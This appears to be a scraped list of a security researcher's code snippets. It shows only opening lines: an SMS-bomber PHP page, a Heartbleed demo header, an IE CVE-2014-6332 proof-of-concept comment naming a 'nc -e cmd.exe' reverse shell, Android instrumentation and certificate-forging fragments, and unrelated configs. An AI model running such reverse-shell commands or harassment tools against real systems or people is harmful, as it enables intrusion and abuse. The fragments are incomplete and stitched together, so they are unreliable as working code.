flankerhqd

<?php
$tel_no = $_GET['hm'];
$c = $_GET['c']?$_GET['c']:0;
$c++;
?>
<!DOCTYPE html>
<html>
<head>
<title>迷你轰炸台 - 短信炸弹 - BETA!</title>
<?php

flankerhqd

#include <sched.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
#include <signal.h>

/* S */
int nuke_cpu(void)

flankerhqd

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select

flankerhqd

/*
 *  Collin's Dynamic Dalvik Instrumentation Toolkit for Android
 *  Collin Mulliner <collin[at]mulliner.org>
 *
 *  (c) 2012,2013
 *
 *  License: LGPL v2.1
 *
 */

flankerhqd

# Path to your oh-my-zsh installation.
export ZSH=$HOME/.oh-my-zsh

# Set name of the theme to load.
# Look in ~/.oh-my-zsh/themes/
# Optionally, if you set this to "random", it'll load a random theme each
# time that oh-my-zsh is loaded.
ZSH_THEME="ys"

# Example aliases

flankerhqd

diff --git a/Android.mk b/Android.mk
index e53b863..1d3854e 100644
--- a/Android.mk
+++ b/Android.mk
@@ -8,7 +8,6 @@ LOCAL_PATH:=		$(call my-dir)
 # /system/etc/mkshrc
 
 include $(CLEAR_VARS)
-
 LOCAL_MODULE:=		mkshrc

flankerhqd

I/dalvikvm(  705): Ljava/lang/Long;
I/dalvikvm(  705): Landroid/graphics/LightingColorFilter;
I/dalvikvm(  705): Landroid/os/StrictMode$LogStackTrace;
I/dalvikvm(  705): Landroid/net/Uri$Part;
I/dalvikvm(  705): Lcom/android/internal/app/AlertController$ButtonHandler;
I/dalvikvm(  705): Landroid/widget/QuickContactBadge$QueryHandler;
I/dalvikvm(  705): Ljava/security/KeyFactorySpi;
I/dalvikvm(  705): Landroid/util/StateSet;
I/dalvikvm(  705): Lcom/android/org/bouncycastle/asn1/x509/AlgorithmIdentifier;
I/dalvikvm(  705): Ljava/util/concurrent/Executors$DefaultThreadFactory;

flankerhqd

import OpenSSL
from OpenSSL.crypto import *
#assume you've already generated client.cer

#extract CERT.RSA
#openssl pkcs7 -in CERT.RSA -print_certs -inform DER -out cert.cer : CA cert isolated from RSA

cacert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open('cert.cer','r').read())
pk = OpenSSL.crypto.PKey()
pk.generate_key(OpenSSL.crypto.TYPE_RSA,1024)

flankerhqd

import org.sireum.util._
import org.sireum.jawa.MessageCenter._
import org.sireum.amandroid.alir.reachingFactsAnalysis.AndroidReachingFactsAnalysisConfig
import org.sireum.jawa.util.Timer
import org.sireum.amandroid.security.apiMisuse.InterestingApiCollector
import org.sireum.jawa.MessageCenter._
import org.sireum.amandroid.util.AndroidLibraryAPISummary
import org.sireum.amandroid.AppCenter
import org.sireum.jawa.alir.reachability.ReachabilityAnalysis
import org.sireum.jawa.JawaCodeSource

flankerhqd

<html>
<head>
<!--
CVE-2014-6332 PoC to bypass IE protected mode if enabled (with localhost) then get shell
The PoC drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target

Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)